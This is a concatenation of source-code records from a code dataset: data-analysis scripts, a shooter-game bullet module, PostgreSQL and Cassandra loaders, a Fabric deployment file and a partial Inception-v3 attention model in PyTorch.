ind = (dat['outcome']=='win')\n dat.loc[ind, 'OutcomeAmount'] = dat.loc[ind, 'winAmount']\n ind = (dat['outcome']=='lose')\n dat.loc[ind, 'OutcomeAmount'] = dat.loc[ind, 'loseAmount']\n\n # add greater and lesser amounts\n dat['GreaterAmount'] = dat['winAmount']\n dat['LesserAmount'] = dat['loseAmount']\n# ind = (dat.Outcome2Amount > dat.Outcome1Amount)\n# dat.loc[ind, 'GreaterAmount'] = dat.loc[ind, 'Outcome2Amount']\n# dat.loc[ind, 'LesserAmount'] = dat.loc[ind, 'Outcome1Amount']\n dat['Won'] = dat['OutcomeAmount'] == dat['GreaterAmount']\n \n dat['win'] = dat.Won.astype(int)\n Ntrial_idx = dat.index.values + 1\n dat['win_prob'] = np.cumsum(dat.win)/Ntrial_idx \n \n# dat['actual_p'] = 0.7\n# dat.loc[dat['MoodTarget']==70, 'actual_p'] = 0.3\n\n return 
dat\n","sub_path":"notebook/MMI_Open_Loop/mmi_mood_LTA_gamma_WO_beta_p0_OL.py","file_name":"mmi_mood_LTA_gamma_WO_beta_p0_OL.py","file_ext":"py","file_size_in_byte":13452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"378375067","text":"from bulletml import Bullet, BulletML, collision\n\nfrom shooter.texture import Texture\n\n\nclass MyBullet(Bullet):\n def __init__(self, radius=8, root=False, **kwargs):\n Bullet.__init__(self, radius=radius, **kwargs)\n for tag in self.tags:\n if tag.startswith(\"texture=\"):\n self.texture = Texture(tag[len(\"texture=\"):])\n break\n else:\n self.texture = None\n self.root = root\n self.z = 0\n\nclass BulletSet(set):\n def update_roots(self, x, y):\n for bullet in self:\n if bullet.root:\n bullet.x = x\n bullet.y = y\n\n def step(self, w,h,t):\n new_bullets = set()\n dead_bullets = set()\n\n for bullet in self:\n new_bullets.update(bullet.step())\n if bullet.finished:\n dead_bullets.add(bullet)\n\n if not (-t <= bullet.x <= w+t) or not (-t <= bullet.y <= h+t):\n dead_bullets.add(bullet)\n\n self |= new_bullets\n self -= dead_bullets\n\n def collides(self, other):\n return collision.collides_all(other, list(self))\n\n def load(self, filename, source, target, rank=0.5):\n bullet = MyBullet.FromDocument(BulletML.FromDocument(open(\"bml/\" + filename, \"rU\")), source.x, source.y, target=target, rank=rank)\n bullet.root = True\n self.add(bullet)\n","sub_path":"shooter/entities/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"150069066","text":"import psycopg2 as p\nfrom sqlalchemy import create_engine\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef FindAnimalID(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tAnimalID = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:9] == \"AnimalID\"):\n\t\t\tAnimalID = current[12:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn AnimalID\n\t\n\t\ndef FindTreatment(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tTreatment = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:10] == \"Treatment\"):\n\t\t\tTreatment = current[13:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn Treatment\n\t\ndef FindHeader(textfile):\n\tmouseText = open(textfile, \"r\")\n\theader = 0\n\tcount = 0\n\twhile(count < 100):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:11] == \"Trial time\"):\n\t\t\theader = count\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn header\n\t\ndef FindInvestigator(textfile, header):\n\tmouseText = open(textfile, \"r\")\n\tInvestigator = \"mouse9999999\"\n\tcount = 0\n\twhile(count < header):\n\t\tcurrent = mouseText.readline()\n\t\tif (current[1:13] == \"Investigator\"):\n\t\t\tInvestigator = current[16:(len(current)-3)]\n\t\t\tbreak\n\t\tcount = count + 1\n\tmouseText.close()\n\treturn Investigator\t\n\n\t\ndef Prep(mouselocation):\t\n\tstart = time.time()\n\tHeaderValue = FindHeader(mouselocation)\n\tAnimalID = FindAnimalID(mouselocation, HeaderValue)\n\tTreatment = FindTreatment(mouselocation, HeaderValue)\n\tInvestigator = FindInvestigator(mouselocation, HeaderValue)\n\tmouse = pd.read_csv(mouselocation, sep=\";\", header=HeaderValue, na_values=[\"-\", 
\"s\", \"s?\", \"cm\", \"cm?\", \"cm/s\", \"cm/s?\"])\n\tmouse = mouse.drop(mouse.index[[0]])\n\tmouse = mouse.reset_index()\n\tdel mouse[\"index\"]\n\tmouse = mouse[[\"Recording time\", \"X center\", \"Y center\", \"Distance moved\", \"Velocity\", \"In zone(InShelter / center-point)\", \"Include: Left Entrance D1\", \"Include: Mid Entrance D1\", \"Include: Right Entrance D1\", \"Include: Left Entrance D2\", \"Include: Mid Entrance D2\", \"Include: Right Entrance D2\", \"Include: Left Entrance Rev D1\", \"Include: Mid Entrance Rev D1\", \"Include: Right Entrance Rev D1\", \"Include: Left Entrance Rev D2\", \"Include: Mid Entrance Rev D2\", \"Include: Right Entrance Rev D2\", \"Hardware command\", \"Hardware continuous\"]]\n\tmouse.columns = [\"Time\", \"X\", \"Y\", \"DistanceMoved\", \"Velocity\", \"InShelter\", \"LeftD1\", \"MiddleD1\", \"RightD1\", \"LeftD2\", \"MiddleD2\", \"RightD2\", \"LeftD3\", \"MiddleD3\", \"RightD3\", \"LeftD4\", \"MiddleD4\", \"RightD4\", \"Command\", \"Continuous\"]\n\tmouse[\"Investigator\"] = Investigator\n\tmouse[\"AnimalID\"] = AnimalID\n\tmouse[\"Treatment\"] = Treatment\n\tprint(AnimalID + \" loaded in \" + str(time.time()-start) + \" seconds\") \n\treturn mouse\n\t\n\ndef AddMouse(mouse):\n\tstart = time.time()\n\tAnimalID = mouse[\"AnimalID\"][0]\n\tfullpath = \"C:/Inputs/\" + AnimalID + \"raw.csv\"\n\tmouse.to_csv(fullpath, index=False)\n\tprint(\"mouse exported to csv in \" + str(time.time()-start) + \" seconds\")\n\tstart = time.time()\n\ttry:\n\t\tconnection = p.connect(user = \"postgres\", password=\"GHJ67car\", host = \"localhost\", port = \"5432\", database = \"mice\")\n\t\tcursor = connection.cursor()\n\t\tcolumns = mouse.columns\n\t\tlastthree = len(columns) - 3\n\t\tcreatequery = \"create table mouse\" + AnimalID + \"(\"\n\t\tfor i in range(0, lastthree):\n\t\t\tcreatequery = createquery + mouse.columns[i] + \" float, \"\n\t\tcreatequery = createquery + mouse.columns[lastthree] + \" varchar(255), \"\n\t\tcreatequery = createquery + mouse.columns[lastthree+1] + \" varchar(255), \"\n\t\tcreatequery = createquery + mouse.columns[lastthree+2] + \" varchar(255))\"\n\t\tcursor.execute(createquery)\n\t\tconnection.commit()\n\t\tcursor.execute(\"copy mouse\" + AnimalID + \" from '\" + fullpath + \"' DELIMITER ',' CSV HEADER;\")\n\t\tconnection.commit()\n\t\tprint(\"mouse copied to PostgreSQL in \" + str(time.time()-start) + \" seconds\")\n\t\t\t\t\n\texcept (Exception, p.Error) as error:\n\t\tprint(\"Error while connecting to PostgreSQL\", error)\n\tfinally:\n\t\tif(connection):\n\t\t\tcursor.close()\n\t\t\tconnection.close()\n\t\t\tprint(\"PostgreSQL connection is closed\")\n\t\t\t\nmouse1 = Prep(\"C:/Inputs/2.txt\")\t\t\t\nAddMouse(mouse1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pandastosql.py","file_name":"pandastosql.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558596419","text":"#Extract features from features.csv code (efcc1.0.0)\r\n#Extract all features and the summary collumn as well from featurs.csv files\r\n#Aggreagates all features into one big matrix in readiness for SVM input\r\n#Effectively creating the labeled data for SVM input\r\n#NB: If you edit this code, change the editor section\r\n#@Author: Karari\r\n#Address: ephantus.karari@ibearesearch.org\r\n#website: ibearesearch.org\r\n#Date Created: 9/7/2020\r\n#Last Edited: 9/7/2020\r\n#Editor: Karari\r\n#version: 1.0.0\r\n#Appreciation: All creators of packages used in 
this code\r\n\r\n#import predefined python packages\r\n\r\nimport os\r\nimport re, math\r\nimport pandas as pd\r\nimport sklearn as sk\r\nimport easygui\r\nfrom collections import Counter\r\n\r\n\r\n\r\n\r\n#define relevant variables\r\ncf_path = ''#csv files path\r\nuf_path=''#User summary file path\r\nsf_path='' #summary file path\r\nof_path='' #output file path\r\ninput_str='' #input string\r\noutput_str=''#output string\r\nif_file=''#holds name of original file for use in naming generated file\r\nin_folder=''#holds name of original folder for use in naming generated folder\r\nfpf_counter=''#counts the number of files per folder\r\nfpi_counter=''#counts the number of files per individual summarizer\r\nsent=''#count the number of sentences per file\r\nindv=''#name of bacth per currator\r\n\r\n#intialize variables and instantiate objects\r\n#ff_path=easygui.fileopenbox()#obtain the path to the features file\r\ncf_path=easygui.fileopenbox()#obtain the path to the csv file\r\n\r\n#Derive summary\r\nroot_path=cf_path\r\nrootdir = cf_path[0:22]\r\nk=0\r\nj=0\r\nprint('Root Folder: '+rootdir)#'C:\\pfiles\\features_csv'\r\nfor subdir, dirs, files in os.walk(rootdir):\r\n l=0\r\n for file in files:\r\n root_path=os.path.join(subdir, file)#\r\n in_folder=root_path[23:29]\r\n #print(root_path)\r\n #convert csv to dataframe and assign headers on the fly\r\n #access the collumn called ds for its values\r\n df = pd.read_csv(root_path,delimiter=',', header=None, names=['1','2','3','4','5','tf','ss','td','sp','ds'])\r\n features=''\r\n #convert the overall sumarry into dataframe\r\n #acess the last collumn now labelled dt(derived total) and write the figures to it.\r\n #df1= pd.read_csv('C:\\\\pfiles\\\\summary\\\\user\\\\summary.csv',delimiter=',', header=None, names=['A','B','C','D','T','DT'])\r\n for i in df.index:\r\n a=str(df['tf'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n b=str(df['ss'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n c=str(df['td'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n d=str(df['sp'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n s=str(df['ds'][i])#obtain the 0 or 1 in derived summary (ds) collumn\r\n\r\n if(len(a)>4):\r\n a=a[0:4]\r\n #print(k[3:])\r\n if((a[3:])=='.'):\r\n a=a[0:2]\r\n \r\n\r\n if(len(b)>4):\r\n b=b[0:3]\r\n if((b[3:])=='.'):\r\n b=b[0:2]\r\n \r\n if(len(c)>4):\r\n c=c[0:4]\r\n #print(k[3:])\r\n if((c[3:])=='.'):\r\n c=c[0:2]\r\n\r\n if(len(d)>4):\r\n d=d[0:4]\r\n #print(k[3:])\r\n if((d[3:])=='.'):\r\n d=d[0:2]\r\n \r\n\r\n features=str(a)+\",\"+str(b)+\",\"+str(c)+\",\"+str(d)+\",\"+str(s)\r\n output_str+=features+'\\n'\r\n k+=1\r\n l+=1\r\n #print(features)\r\n #print(\"File \"+root_path+\" has \"+str(i+1)+\" lines\")\r\n \r\n #print(\"Folder \"+in_folder+\" has \"+str(l+1)+\" lines\")\r\n#print(\"Total Lines \"+str(k)+\" of 33525 written\")\r\n \r\nprint(\"Done-Check file in path:C:\\\\pfiles\\\\Matrix\\\\matrix.txt\")\r\n#write back the data frame df1 to the csv file\r\n#together with the new collumn 'DT' for derived total\r\n#store the resolved feature matrix in a file (matrix)in C:\\pfiles\\Matrix folder\r\n#of_path=easygui.fileopenbox()#obtain the path to the output file\r\nof_path='C:\\\\pfiles\\\\Matrix\\\\matrix.txt'\r\n#os.makedirs(os.path.dirname(of_path), exist_ok=True)#create folder that does not exist\r\nwith open(of_path, 'w',encoding='UTF8') as f_out:\r\n f_out.write(output_str)\r\n f_out.close()\r\n#pd.to_csv('C:\\\\pfiles\\\\summary\\\\user\\\\s.csv', index=False, header=None) \r\n 
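#Hedged sketch (added; not part of the original efcc pipeline): one way the\r\n#matrix written above could be loaded back as labeled SVM input. The path and\r\n#the five-column layout (tf,ss,td,sp,label) are assumptions taken from this script.\r\ndef load_matrix_for_svm(path='C:\\\\pfiles\\\\Matrix\\\\matrix.txt'):\r\n    import numpy as np\r\n    from sklearn import svm\r\n    data = np.loadtxt(path, delimiter=',')#one row per sentence, as written above\r\n    X, y = data[:, :4], data[:, 4]#first four columns are features, last is the label\r\n    return svm.SVC().fit(X, y)#fitted classifier, ready to call .predict on\r\n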
#EOF\r\n","sub_path":"qodec1.0.0/efcc1_0_0.py","file_name":"efcc1_0_0.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"346910442","text":"# from __future__ import with_statement\nfrom fabric.api import local, abort, settings, run, env, cd, sudo\nfrom fabric.contrib.console import confirm\n\nenv.roledefs = {\n 'dev': ['localhost'],\n 'prod': ['root@737apps.com']\n}\n\nenv.roledefs['all'] = [h for r in env.roledefs.values() for h in r]\n\n\ndef commit(message='updating...'):\n \"\"\"\n commit changes to staging area\n :param message:\n :return:\n \"\"\"\n local(\"git add --all\")\n with settings(warn_only=True):\n result = local(\"git commit -m '%s'\" % message, capture=True)\n if result.failed and not confirm(\"Tests failed. Continue anyway?\"):\n abort(\"Aborting at your behest\")\n\n\ndef pull():\n \"\"\"\n update environment\n :return:\n \"\"\"\n local(\"git pull\")\n\n\ndef migrate(is_local=True):\n \"\"\"\n update environment\n :return:\n \"\"\"\n if is_local:\n local(\"php artisan migrate\")\n else:\n run(\"php artisan migrate\")\n\n\ndef update_environs(message='updating...'):\n \"\"\"\n update local working environment\n :return:\n \"\"\"\n commit(message)\n pull()\n migrate()\n\n\ndef push(message='updating...', should_commit=True):\n \"\"\"\n push changes\n :return:\n \"\"\"\n if should_commit is True:\n commit(message)\n local(\"git push\")\n\n\ndef start_services(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl start %s' % _service)\n\n\ndef stop_service(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl stop %s' % _service)\n\n\ndef restart_service(service_paths=list()):\n \"\"\"\n restart a system service\n :param service_paths:\n :return:\n \"\"\"\n for _service in service_paths:\n sudo('systemctl restart %s' % _service)\n\n\ndef clear(is_remote=False):\n \"\"\"\n clear configuration\n \"\"\"\n if is_remote:\n run('php artisan config:clear')\n run('php artisan config:cache')\n run('php artisan view:clear')\n return\n\n local('php artisan config:clear')\n local('php artisan config:cache')\n local('php artisan view:clear')\n return\n\n\ndef deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n clear(True)\n restart_service(['httpd'])\n\n\ndef migrate_deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n migrate(is_local=False)\n clear(True)\n restart_service(['httpd'])\n\n\ndef full_deploy():\n \"\"\"\n update production environment\n :return:\n \"\"\"\n with cd('/var/www/html/musicApp'):\n sudo('git pull')\n sudo('composer install')\n migrate(is_local=False)\n clear(True)\n restart_service(['httpd'])","sub_path":"server/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511558043","text":"import faker\nimport random\nimport multiprocessing\nfrom cassandra.cluster import Cluster\n\nimport constants\n\n\nclass CassandraFillerFakes(faker.providers.BaseProvider):\n def __init__(self, *args, **kwargs):\n super(CassandraFillerFakes, self)\n self.fake = faker.Faker()\n\n def register(self):\n return {\n 
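# columns of the register table rendered as CQL literals (uuid(), quoted\n            # date/timestamp strings) so _insert_record can splice them straight into the query\n            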
'day': \"'{}'\".format(self.fake.date()),\n 'user_id': 'uuid()',\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"'{} {}.123'\".format(self.fake.date(), self.fake.time())\n }\n\n def user_activity(self):\n return {\n 'user_id': 'uuid()',\n 'event_type': \"'{}'\".format(random.choice(constants.EVENT_TYPES)),\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"dateOf(now())\"\n }\n\n def enter_attempts(self):\n return {\n 'day': \"toDate(now())\",\n 'user_id': 'uuid()',\n 'device_type': \"'{}'\".format(random.choice(constants.DEVICE_TYPES)),\n 'event_time': \"dateOf(now())\"\n }\n\n\nclass CassandraFiller:\n def __init__(self):\n self.cluster = Cluster()\n self.session = self.cluster.connect(constants.KEYSPACE_NAME)\n self.faker = faker.Faker()\n self.faker.add_provider(CassandraFillerFakes)\n\n def _insert_record(self, database, record, ttl=''):\n query = \"INSERT INTO {}{} VALUES ({}) {};\" \\\n .format(database, constants.DATABASES_COLUMNS[database], record, ttl)\n self.session.execute(query)\n\n def insert_register_record(self, data=None):\n if not data:\n data = self.faker.register()\n\n values = ''\n\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_REGISTER, values[:-2])\n\n def insert_registers(self, records_number):\n for user_id in range(records_number):\n data = self.faker.register()\n self.insert_register_record(data)\n\n def insert_user_activity_record(self, data=None):\n if not data:\n data = self.faker.user_activity()\n\n ttl = ''\n values = ''\n\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_USER_ACTIVITY, values[:-2], ttl)\n\n def insert_user_activities(self, records_number):\n for _ in range(records_number):\n data = self.faker.user_activity()\n self.insert_user_activity_record(data)\n\n def insert_enter_attempts_record(self, data=None):\n if not data:\n data = self.faker.enter_attempts()\n\n values = ''\n for key in data.keys():\n values += str(data[key])\n values += ', '\n self._insert_record(constants.DB_ENTER_ATTEMPTS, values[:-2])\n\n def insert_enter_attempts(self, records_number):\n for _ in range(records_number):\n data = self.faker.enter_attempts()\n self.insert_enter_attempts_record(data)\n\n\ndef fill():\n filler = CassandraFiller()\n # activity = filler.get_register()\n # filler.insert_registers(200000)\n # filler.insert_user_activities(200000)\n filler.insert_enter_attempts(200)\n\n\ndef multiprocessing_fill(processes_number):\n workers = []\n for i in range(processes_number):\n workers.append(multiprocessing.Process(target=fill))\n\n for worker in workers:\n worker.start()\n\n for worker in workers:\n worker.join()\n\n\nif __name__ == '__main__':\n filler = CassandraFiller()\n # activity = filler.get_register()\n # filler.insert_registers(20)\n # print(list(activity))\n # filler.insert_register({'day': \"'2018-01-03'\", #'toconstants.Date(now())',\n # 'user_id': i,\n # 'device_type': \"'mobile'\",\n # 'event_time': 'dateOf(now())'})\n # multiprocessing_fill()\n filler.insert_user_activities(20000)\n filler.insert_registers(20000)\n filler.insert_enter_attempts(20000)\n # filler.remove_registers_by_uuids('bb1ed1ec-28b6-4b93-9ffa-e0e0d40d73da')\n # filler.update_register_by_uuid(\"device_type = 'mobile'\", 
'834cd519-b58b-490d-bf3e-953da8cdc8de')\n","sub_path":"course_3/helper-concierge/api/cassandra_api/filler.py","file_name":"filler.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"294091230","text":"from .se_module import SELayer\nfrom torchsummary import summary\nfrom torchvision.models.inception import Inception3\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nfrom .da_att import PAM_Module,CAM_Module\n\n__all__ = ['Inception3','Inception_v3_PAM']\n\nmodel_urls = {\n 'inception_v3_google':'https://download.pytorch.org/models/inception_v3_google-1a9a5a14.pth'\n}\n\n\n'''\nThis model is inceptionV3+SENet+PAM_Module/CAM_Module\n'''\ndef Inception_v3_PAM(pretrained=False,**kwargs):\n if pretrained:\n if 'transform_input' not in kwargs:\n kwargs['transform_input'] = True\n model = Inception3(**kwargs)\n model.load_state_dict(model_zoo.load_url(model_urls['inception_v3_google']))\n return model\n return Inception3(**kwargs)\n\nclass Inception3(nn.Module):\n def __init__(self,num_classes=1000,aux_logits=True,transform_input=False):\n super(Inception3,self).__init__()\n self.aux_logits = aux_logits\n self.transform_input = transform_input\n self.Conv2d_1a_3x3 = BasicConv2d(3,32,kernel_size=3,stride=2)\n self.Conv2d_2a_3x3 = BasicConv2d(32,32,kernel_size=3)\n self.Conv2d_2b_3x3 = BasicConv2d(32, 64, kernel_size=3,padding=1)\n self.Conv2d_3b_1x1 = BasicConv2d(64, 80, kernel_size=1)\n self.Conv2d_4a_3x3 = BasicConv2d(80, 192, kernel_size=3)\n self.Conv2d_get_feature = nn.Conv2d(2048,3,kernel_size=1,bias=False)\n self.Mixed_5b = nn.Sequential(\n InceptionA(192,pool_features=32))\n self.PAM_1 = PAM_Module(256)\n self.CAM_1 = CAM_Module(256)\n\n self.Mixed_5c = nn.Sequential(\n InceptionA(256, pool_features=64))\n self.PAM_2 = PAM_Module(288)\n self.CAM_2 = CAM_Module(288)\n\n self.Mixed_5d = nn.Sequential(\n InceptionA(288, pool_features=64))\n self.PAM_3 = PAM_Module(288)\n self.CAM_3 = CAM_Module(288)\n # downsample\n self.Mixed_6a = nn.Sequential(\n InceptionB(288))\n self.PAM_4 = PAM_Module(768)\n self.CAM_4 = CAM_Module(768)\n\n self.Mixed_6b = nn.Sequential(\n InceptionC(768, channels_7x7=128))\n self.PAM_5 = PAM_Module(768)\n self.CAM_5 = CAM_Module(768)\n\n self.Mixed_6c = nn.Sequential(\n InceptionC(768, channels_7x7=160))\n self.PAM_6 = PAM_Module(768)\n self.CAM_6 = CAM_Module(768)\n\n self.Mixed_6d = nn.Sequential(\n InceptionC(768, channels_7x7=160))\n self.PAM_7 = PAM_Module(768)\n self.CAM_7 = CAM_Module(768)\n\n self.Mixed_6e = nn.Sequential(\n InceptionC(768, channels_7x7=192))\n self.PAM_8 = PAM_Module(768)\n self.CAM_8 = CAM_Module(768)\n\n if aux_logits:\n self.AuxLogits = InceptionAux(768,num_classes)\n # downsample\n self.Mixed_7a = nn.Sequential(\n InceptionD(768))\n self.PAM_9 = PAM_Module(1280)\n self.CAM_9 = CAM_Module(1280)\n\n self.Mixed_7b = nn.Sequential(\n InceptionE(1280))\n self.PAM_10 = PAM_Module(2048)\n self.CAM_10 = CAM_Module(2048)\n\n self.Mixed_7c = nn.Sequential(\n InceptionE(2048))\n self.PAM_11 = PAM_Module(2048)\n self.CAM_11 = CAM_Module(2048)\n\n self.fc = nn.Linear(2048,num_classes)\n\n for m in self.modules():\n if isinstance(m,nn.Conv2d) or isinstance(m,nn.Linear):\n import scipy.stats as stats\n stddev = m.stddev if hasattr(m,'stddev') else 0.1\n X = stats.truncnorm(-2,2,scale=stddev)\n values = torch.as_tensor(X.rvs(m.weight.data.numel()),dtype=m.weight.dtype)\n values = 
values.view(m.weight.size())\n with torch.no_grad():\n m.weight.data.copy_(values)\n elif isinstance(m,nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x):\n if self.transform_input:\n x = x.clone()\n x[:, 0] = x[:, 0] * (0.229 / 0.5) + (0.485 - 0.5) / 0.5\n x[:, 1] = x[:, 1] * (0.224 / 0.5) + (0.456 - 0.5) / 0.5\n x[:, 2] = x[:, 2] * (0.225 / 0.5) + (0.406 - 0.5) / 0.5\n\n x = self.Conv2d_1a_3x3(x)\n x = self.Conv2d_2a_3x3(x)\n x = self.Conv2d_2b_3x3(x)\n x = F.max_pool2d(x,kernel_size=3,stride=2)\n x = self.Conv2d_3b_1x1(x)\n x = self.Conv2d_4a_3x3(x)\n x = F.max_pool2d(x,kernel_size=3,stride=2)\n\n x = self.Mixed_5b(x)\n x1 = self.PAM_1(x)\n x2 = self.CAM_1(x)\n x = x1 + x2\n\n x = self.Mixed_5c(x)\n x1 = self.PAM_2(x)\n x2 = self.CAM_2(x)\n x = x1 + x2\n\n x = self.Mixed_5d(x)\n x1 = self.PAM_3(x)\n x2 = self.CAM_3(x)\n x = x1 + x2\n\n x = self.Mixed_6a(x)\n x1 = self.PAM_4(x)\n x2 = self.CAM_4(x)\n x = x1 + x2\n # \"\"\"In practice, we have found that employing this factorization does not\n # work well on early layers, but it gives very good results on medium\n # grid-sizes (On m × m feature maps, where m ranges between 12 and 20).\n # On that level, very good results can be achieved by using 1 × 7 convolutions\n # followed by 7 × 1 convolutions.\"\"\"\n x = self.Mixed_6b(x)\n x1 = self.PAM_5(x)\n x2 = self.CAM_5(x)\n x = x1 + x2\n\n x = self.Mixed_6c(x)\n x1 = self.PAM_6(x)\n x2 = self.CAM_6(x)\n x = x1 + x2\n\n x = self.Mixed_6d(x)\n x1 = self.PAM_7(x)\n x2 = self.CAM_7(x)\n x = x1 + x2\n\n x = self.Mixed_6e(x)\n x1 = self.PAM_8(x)\n x2 = self.CAM_8(x)\n x = x1 + x2\n\n # Efficient Grid Size Reduction\n x = self.Mixed_7a(x)\n x1 = self.PAM_9(x)\n x2 = self.CAM_9(x)\n x = x1 + x2\n\n # We are using this solution only on the coarsest grid,\n # since that is the place where producing high dimensional\n # sparse representation is the most critical as the ratio of\n # local processing (by 1 × 1 convolutions) is increased compared\n # to the spatial aggregation.\"\"\"\n x = self.Mixed_7b(x)\n x1 = self.PAM_10(x)\n x2 = self.CAM_10(x)\n x = x1 + x2\n\n x = self.Mixed_7c(x)\n x1 = self.PAM_11(x)\n x2 = self.CAM_11(x)\n x = x1 + x2\n\n\n x = F.avg_pool2d(x,kernel_size=7)\n\n x = x.view(x.size(0), -1)\n return x\n\n\nclass InceptionA(nn.Module):\n\n def __init__(self, input_channels, pool_features):\n super().__init__()\n self.branch1x1 = BasicConv2d(input_channels, 64, kernel_size=1)\n\n self.branch5x5_1 = BasicConv2d(input_channels, 48, kernel_size=1)\n self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)\n\n self.branch3x3dbl_1 = BasicConv2d(input_channels, 64, kernel_size=1)\n self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)\n self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)\n\n self.branchpool = BasicConv2d(input_channels, pool_features, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1(same)\n branch1x1 = self.branch1x1(x)\n\n #x -> 1x1 -> 5x5(same)\n branch5x5 = self.branch5x5_1(x)\n branch5x5 = self.branch5x5_2(branch5x5)\n #branch5x5 = self.branch5x5_2(branch5x5)\n\n #x -> 1x1 -> 3x3 -> 3x3(same)\n branch3x3dbl = self.branch3x3dbl_1(x)\n branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n branch_pool = F.avg_pool2d(x,kernel_size=3,stride=1,padding=1)\n branch_pool = self.branchpool(branch_pool)\n\n #x -> pool -> 1x1(same)\n outputs = [branch1x1,branch5x5,branch3x3dbl,branch_pool]\n return torch.cat(outputs, 1)\n\n\nclass 
InceptionB(nn.Module):\n\n def __init__(self, input_channels):\n super().__init__()\n\n self.branch3x3 = BasicConv2d(input_channels, 384, kernel_size=3, stride=2)\n\n self.branch3x3dbl_1 = BasicConv2d(input_channels, 64, kernel_size=1)\n self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)\n self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)\n\n def forward(self, x):\n\n #x - > 3x3(downsample)\n branch3x3 = self.branch3x3(x)\n\n #x -> 3x3 -> 3x3(downsample)\n branch3x3dbl = self.branch3x3dbl_1(x)\n branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)\n branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)\n\n #x -> maxpool(downsample)\n branchpool = F.max_pool2d(x,kernel_size=3,stride=2)\n\n #\"\"\"We can use two parallel stride 2 blocks: P and C. P is a pooling\n #layer (either average or maximum pooling) the activation, both of\n #them are stride 2 the filter banks of which are concatenated as in\n #figure 10.\"\"\"\n outputs = [branch3x3, branch3x3dbl, branchpool]\n\n return torch.cat(outputs, 1)\n\n\nclass InceptionC(nn.Module):\n def __init__(self, input_channels, channels_7x7):\n super(InceptionC,self).__init__()\n self.branch1x1 = BasicConv2d(input_channels, 192, kernel_size=1)\n\n c7 = channels_7x7\n #In theory, we could go even further and argue that one can replace any n × n\n #convolution by a 1 × n convolution followed by a n × 1 convolution and the\n #computational cost saving increases dramatically as n grows (see figure 6).\n self.branch7x7_1 = BasicConv2d(input_channels, c7, kernel_size=1)\n self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7), padding=(0,3))\n self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7,1), padding=(3,0))\n\n self.branch7x7dbl_1 = BasicConv2d(input_channels, c7, kernel_size=1)\n self.branch7x7dbl_2 =BasicConv2d(c7, c7, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7dbl_3 =BasicConv2d(c7, c7, kernel_size=(1, 7), padding=(0, 3))\n self.branch7x7dbl_4 =BasicConv2d(c7, c7, kernel_size=(7, 1), padding=(3, 0))\n self.branch7x7dbl_5 =BasicConv2d(c7, 192, kernel_size=(1, 7), padding=(0, 3))\n\n\n self.branch_pool = BasicConv2d(input_channels, 192, kernel_size=1)\n\n def forward(self, x):\n\n #x -> 1x1(same)\n branch1x1 = self.branch1x1(x)\n\n #x -> 1layer 1*7 and 7*1 (same)\n branch7x7 = self.branch7x7_1(x)\n branch7x7 = self.branch7x7_2(branch7x7)\n branch7x7 = self.branch7x7_3(branch7x7)\n\n #x-> 2layer 